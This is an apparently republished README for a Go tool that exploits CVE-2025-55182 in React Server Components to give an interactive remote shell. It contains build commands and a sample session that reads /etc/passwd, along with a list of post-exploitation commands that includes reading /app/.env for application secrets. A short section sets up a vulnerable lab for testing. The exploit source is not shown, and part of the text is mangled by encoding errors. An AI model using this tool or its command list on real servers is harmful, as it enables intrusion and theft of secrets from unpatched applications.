Share
## https://sploitus.com/exploit?id=8E9A69E3-6BE6-535B-B381-83A623ADD927
# ๐ป CVE-2025-55182
> Interactive RCE exploitation tool for CVE-2025-55182 (React Server Components)
[](https://github.com/Hghost0x00)
[](LICENSE)
[](https://golang.org/dl/)
## ๐ฏ What Is This?
**CVE-2025-55182** is a minimal, interactive RCE exploitation tool targeting **CVE-2025-55182**, a critical vulnerability in React Server Components (RSC) affecting React 19.0.0 - 19.2.0 and Next.js applications.
**Features:**
- ๐ฅ Interactive shell with command execution
- ๐ป Clean, hacker-style CLI interface
- ๐ฏ Automatic vulnerability detection
- ๐ค Real-time command output extraction
- โก Zero dependencies (pure Go stdlib)
---
## ๐ฆ Installation
### Prerequisites
- Go 1.18 or higher
- A vulnerable target running React 19.0.0 - 19.2.0
### Build from source
```bash
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go
```
---
## ๐ Usage
### Basic Usage
```bash
./ghost-scanner
```
### Interactive Session
```
_____________ _______________ _______________ ________ .________ .________.____________ ______ ________
โฒ_ ___ โฒ โฒ โฑ โฑโฒ_ _____โฑ โฒ_____ โฒ _ โฒ โฒ_____ โฒ โ ____โฑ โ ____โฑโ ____โฑ_ โโฑ __ โฒ โฒ_____ โฒ
โฑ โฒ โฒโฑโฒ Y โฑ โ __)_ ______ โฑ ____โฑ โฑ_โฒ โฒ โฑ ____โฑ โ____ โฒ ______ โ____ โฒ โ____ โฒ โ โ> < โฑ ____โฑ
โฒ โฒ____โฒ โฑ โ โฒ โฑ_____โฑ โฑ โฒ โฒ_โฑ โฒโฑ โฒ โฑ โฒ โฑ_____โฑ โฑ โฒโฑ โฒโ โฑ โโ โฒโฑ โฒ
โฒ______ โฑ โฒ___โฑ โฑ_______ โฑ โฒ_______ โฒ_____ โฑโฒ_______ โฒโฑ______ โฑ โฑ______ โฑ______ โฑโ___โฒ______ โฑโฒ_______ โฒ
โฒโฑ โฒโฑ โฒโฑ โฒโฑ โฒโฑ โฒโฑ โฒโฑ โฒโฑ โฒโฑ โฒโฑ
React2Shell RCE | CVE-2025-55182
@hghost010
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[?] Target: localhost:3000
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] VULNERABLE
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)
ghost@rce $ whoami
node
ghost@rce $ pwd
/app
ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash
ghost@rce $ exit
```
---
## ๐ฅ Demo
Comming SOon..
---
**Affected Versions:**
- React 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Next.js applications using these React versions
**Patched Versions:**
- React 19.2.1+
- Next.js with updated React dependency
---
## ๐งช Testing Lab Setup
Want to test this safely? Set up a vulnerable lab environment:
```bash
# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182
# Install and run
npm install --legacy-peer-deps
npm run dev
# In another terminal, run ghost-scanner
./ghost-scanner
# Enter: localhost:3000
```
---
## ๐ Common Commands
```bash
ghost@rce $ id # Check user privileges
ghost@rce $ whoami # Current username
ghost@rce $ pwd # Current directory
ghost@rce $ ls -la # List files
ghost@rce $ cat /etc/passwd # Read files
ghost@rce $ uname -a # System information
ghost@rce $ env # Environment variables
ghost@rce $ ps aux # Running processes
ghost@rce $ netstat -tulpn # Network connections
ghost@rce $ cat /app/.env # Application secrets
```
---
## ๐ Repository Stats



---
## ๐ References
- [CVE-2025-55182 Details](https://cloud.projectdiscovery.io/library/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
- [Original PoC by maple3142](https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3)
- [Assetnote Research](https://github.com/assetnote/react2shell-scanner)
- [Vulnerable Test App](https://github.com/zack0x01/vuln-app-CVE-2025-55182)
---
## ๐ฌ Community & Support
- ๐ฆ **Twitter/X:** [@hghost010](https://x.com/hghost010)
- ๐ **GitHub:** [Hghost0x00](https://github.com/Hghost0x00)
**Found a bug?** Open an issue
**Have questions?** Drop a comment on YouTube
---
## โญ Show Your Support
If this tool helped you:
- โญ **Star this repository**
- ๐บ **Subscribe to the channel**
- ๐ฌ **Share with others**
---
## ๐ License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
---
**Made with ๐ป by Hghost0x00**
**Happy hacking โก**